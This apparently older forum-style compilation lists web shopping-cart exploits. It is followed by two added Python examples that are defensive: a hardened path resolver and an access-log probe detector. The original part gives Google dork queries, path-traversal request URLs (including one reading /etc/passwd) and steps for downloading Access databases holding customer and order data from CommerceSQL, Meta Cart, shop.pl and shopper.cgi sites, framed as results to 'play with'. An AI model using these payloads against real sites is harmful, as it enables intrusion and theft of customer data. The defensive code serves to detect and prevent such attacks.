Here I leave you a compilation of web shopping exploits,
but I take no responsibility for what it is used for; this article is for educational purposes.
CodeZero
inurl:admin/files/order.log

CommerceSQL

Proof of concept as follows:

Example: www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

---

Meta Cart:

Meta Cart is a free e-commerce shopping cart system based on ASP and SQL. The database holding the information is located at:

http://www.domain.com/database/metacart.mdb
http://www.domain.com/metacart/database/metacart.mdb

So yet again you could do a simple inurl:metacart.mdb search in Google, find results, grab the Access database, open it in Access, and you have the company's information. This is why companies need to protect this data; it's a must for security reasons. All they would have to do is set the permissions on the database in the control panel in Information Services, but admins are too lazy and don't double-check. So when your folder is set to Write, Read and Execute, you know something is wrong. It should be set to Write and Execute for Anonymous so people can't download the database, and then rwx on the database itself so you can make changes, of course.

----

SHOP.PL Vuln

Yet another system that people are using against companies, again to access their files and get data. Proof of concept:

http://www.domain.com/cgi-local/shop.pl/page=shop.cfg
is where the config file is located.

http://www.domain.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.domain.com/cgi-local/shop.pl/page=./product_list

And again you can do a simple search in Google for inurl: shop.pl

Windows Servers VULN, lazy admins:

A way to get .mdb files (Access databases) off ASP servers. Search for shopdisplaycategories.asp:

inurl:shopdisplaycategories.asp

Plenty of sites use this. Once you find some results, change the URL to:

http://www.domain.com/shopdbtest.asp

Now you are in a section of the site that tells you where the .mdb file is located: xDatabase: shopping and xDblocation:\shop_db. Now just put:

http://www.domain.com/shop_db/shopping.mdb

Basically you can download their Access database with their whole online shop and all their customer data. Lazy admins who don't set the correct permissions will leave this open, but smart ones won't let you download the database.

Other Key tricks:

Going in Google: search for "/cgi/shopper.cgi?" or, for more results, try "/cgi-bin/shopper.cgi?" ("shopcart.cgi" can also be used). Find a site ("your shopping cart" or "Subtotal $0.00") and remove everything after shopper.cgi (the URL should contain "/cgi/shopper.cgi?display=action" or "/cgi-bin/shopper.cgi?display=action" or possibly "checkout=action"). Add "?search=action&keywords=%20&template=order.log" to the URL, and

/cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf
/cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf
/cgi-bin/pdg_cart/shopper.conf
/cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt

are some results to play with.

Other Vulns Using Google searching:

inurl:shopping.mdb inurl:cart/cart.asp inurl:/productcart inurl:vti_inf.html inurl:service.pwd
inurl:users.pwd inurl:authors.pwd inurl:administrators.pwd inurl:shtml.dll inurl:shtml.exe
inurl:fpcount.exe inurl:default.asp inurl:showcode.asp inurl:sendmail.cfm inurl:getFile.cfm
inurl:imagemap.exe inurl:test.bat inurl:msadcs.dll inurl:htimage.exe inurl:counter.exe
inurl:browser.inc inurl:hello.bat inurl:default.asp\ inurl:dvwssr.dll inurl:cart32.exe
inurl:add.exe inurl:index.jsp inurl:SessionServlet inurl:glimpse inurl:man.sh
inurl:AT-admin.cgi inurl:AT-generate.cgi

Once you find a site, you can use various scanners.

WIN32 Scanners:
http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one.
http://rhino.deny.de/ Triton Scanner
http://www.ksoze.deny.de/ ksoze's Scanner
http://wolfman.deny.de/ webshare scanner
http://xtremet.deny.de/ cmx scanner
http://www.accessdiver.com Accessdiver
http://www.safety-lab.com you can get Shadow Security Scanner (shareware)

UNIX: (opensource)
http://packetstormsecurity.nl/UNIX/cgi-scanners/nikto-1.31.tar.gz

All of these can load a path list to test your servers for vulnerabilities when auditing. Here is an updated list of security holes against most of the shopping carts. Admins, please protect your systems. You don't want your customers' data at risk.

---

Loadable List to test security:
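
The page= and template= requests quoted in the CommerceSQL, SHOP.PL and shopper.cgi sections work because the script opens whatever file name the parameter carries. An added example (not from the original post or from any of the carts named; the function names, the directory layout and the rule that templates end in .htm or .html are assumptions) showing that pattern beside a hardened resolver:

```python
import os
import re
import tempfile

class RejectedPage(ValueError):
    """The requested page name must not be served."""

# Allowlist: segments of letters, digits, "_" and "-", ending in .htm or .html.
# Anything with "..", a leading "/", "%", NUL, ";", "|" or "\" fails to match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*\.html?")

def resolve_vulnerable(template_dir, page):
    """'Before' form: the parameter is appended to a directory and used as-is."""
    return os.path.normpath(os.path.join(template_dir, page))

def resolve_hardened(template_dir, page):
    """Return the real path of a template, or raise RejectedPage."""
    if not SAFE_NAME.fullmatch(page):
        raise RejectedPage("name is not on the allowlist")
    base = os.path.realpath(template_dir)
    target = os.path.realpath(os.path.join(base, page))
    # realpath() follows symlinks, so a link that points out of the
    # template directory is caught by the containment check below.
    if os.path.commonpath([base, target]) != base:
        raise RejectedPage("resolves outside the template directory")
    if not os.path.isfile(target):
        raise RejectedPage("no such template")
    return target

def build_sample_store(root):
    """Constructed layout: public templates, a config file beside them,
    and a private order log one directory over."""
    templates = os.path.join(root, "store", "templates")
    private = os.path.join(root, "store", "admin", "files")
    os.makedirs(templates)
    os.makedirs(private)
    for path, body in [
        (os.path.join(templates, "product_list.html"), "<html>catalogue</html>"),
        (os.path.join(templates, "shop.cfg"), "merchant_key=CONSTRUCTED"),
        (os.path.join(private, "order.log"), "constructed order record"),
    ]:
        with open(path, "w") as handle:
            handle.write(body)
    return templates

# Constructed parameter values modelled on the request shapes quoted above.
SAMPLE_PAGES = ["product_list.html", "shop.cfg", "../admin/files/order.log"]

def run_demo():
    """Map each sample value to (served by 'before' form, hardened verdict)."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        templates = build_sample_store(root)
        for page in SAMPLE_PAGES:
            served = os.path.isfile(resolve_vulnerable(templates, page))
            try:
                resolve_hardened(templates, page)
                verdict = "served"
            except RejectedPage as err:
                verdict = "rejected: %s" % err
            results[page] = (served, verdict)
    return results

if __name__ == "__main__":
    for page, outcome in run_demo().items():
        print(page, outcome)
```

The shop.cfg case shows why a traversal check alone is not enough: the config file sits inside the template directory, so only the extension allowlist keeps it from being served.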
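
A scanner working through a path list like the one referred to above leaves a recognisable trace in the server's access log. An added example (not part of the original post; the log lines are constructed and use documentation IP ranges, and the rule set and threshold are assumptions to tune per site) that flags these request shapes and separates probes from requests the server actually answered:

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')

# Direct requests for data files that should never be downloadable.
DATA_FILE = re.compile(r"\.(mdb|pwd)$|(^|/)orders?\.(log|txt)$")
# File-selecting parameters, in the query string or in the path (shop.pl style).
PARAM = re.compile(r"(?:^|[/?&])(?:page|template|file)=([^&]*)")
# Extensions a page/template parameter has no business naming.
NON_TEMPLATE_EXT = re.compile(r"\.(log|conf|cfg|mdb|txt|pl|cgi)$")

def full_decode(value, rounds=3):
    """Undo nested URL encoding such as %2520 before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return the set of reasons a request target looks like a cart probe."""
    decoded = full_decode("/" + target.lstrip("/")).lower()
    path = decoded.split("?", 1)[0]
    reasons = set()
    if DATA_FILE.search(path):
        reasons.add("data-file")
    if "../" in decoded or "..\\" in decoded:
        reasons.add("traversal")
    for value in PARAM.findall(decoded):
        if NON_TEMPLATE_EXT.search(value.strip()):
            reasons.add("file-param")
    return reasons

def analyze(lines, scan_threshold=3):
    """Split flagged requests into answered ones and per-IP scanning."""
    flagged = defaultdict(set)
    exposed = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        reasons = classify(match["target"])
        if not reasons:
            continue
        flagged[match["ip"]].add(match["target"])
        if match["status"] == "200":  # the server returned content: top priority
            exposed.append((match["ip"], match["target"], sorted(reasons)))
    scanners = sorted(ip for ip, hits in flagged.items()
                      if len(hits) >= scan_threshold)
    return {"exposed": exposed, "scanners": scanners}

# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "GET /catalog/index.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Mar/2024:10:00:03 +0000] "GET /database/metacart.mdb HTTP/1.1" 404 210',
    '203.0.113.7 - - [12/Mar/2024:10:00:03 +0000] "GET /shop_db/shopping.mdb HTTP/1.1" 404 210',
    '203.0.113.7 - - [12/Mar/2024:10:00:04 +0000] "GET /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log HTTP/1.1" 404 210',
    '203.0.113.7 - - [12/Mar/2024:10:00:04 +0000] "GET /cgi-local/shop.pl/page=shop.cfg HTTP/1.1" 404 210',
    '198.51.100.23 - - [12/Mar/2024:11:30:12 +0000] "GET /cgi-bin/shopper.cgi?search=action&keywords=%2520&template=order.log HTTP/1.1" 200 48211',
    '192.0.2.10 - - [12/Mar/2024:11:31:40 +0000] "GET /cgi-bin/shopper.cgi?display=action HTTP/1.1" 200 3300',
]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("answered with content:", report["exposed"])
    print("scanning sources:", report["scanners"])
```

An entry under "exposed" means a flagged request got a 200 response, so the named file should be treated as disclosed and moved out of the web root; entries under "scanners" are sources that tried several flagged paths.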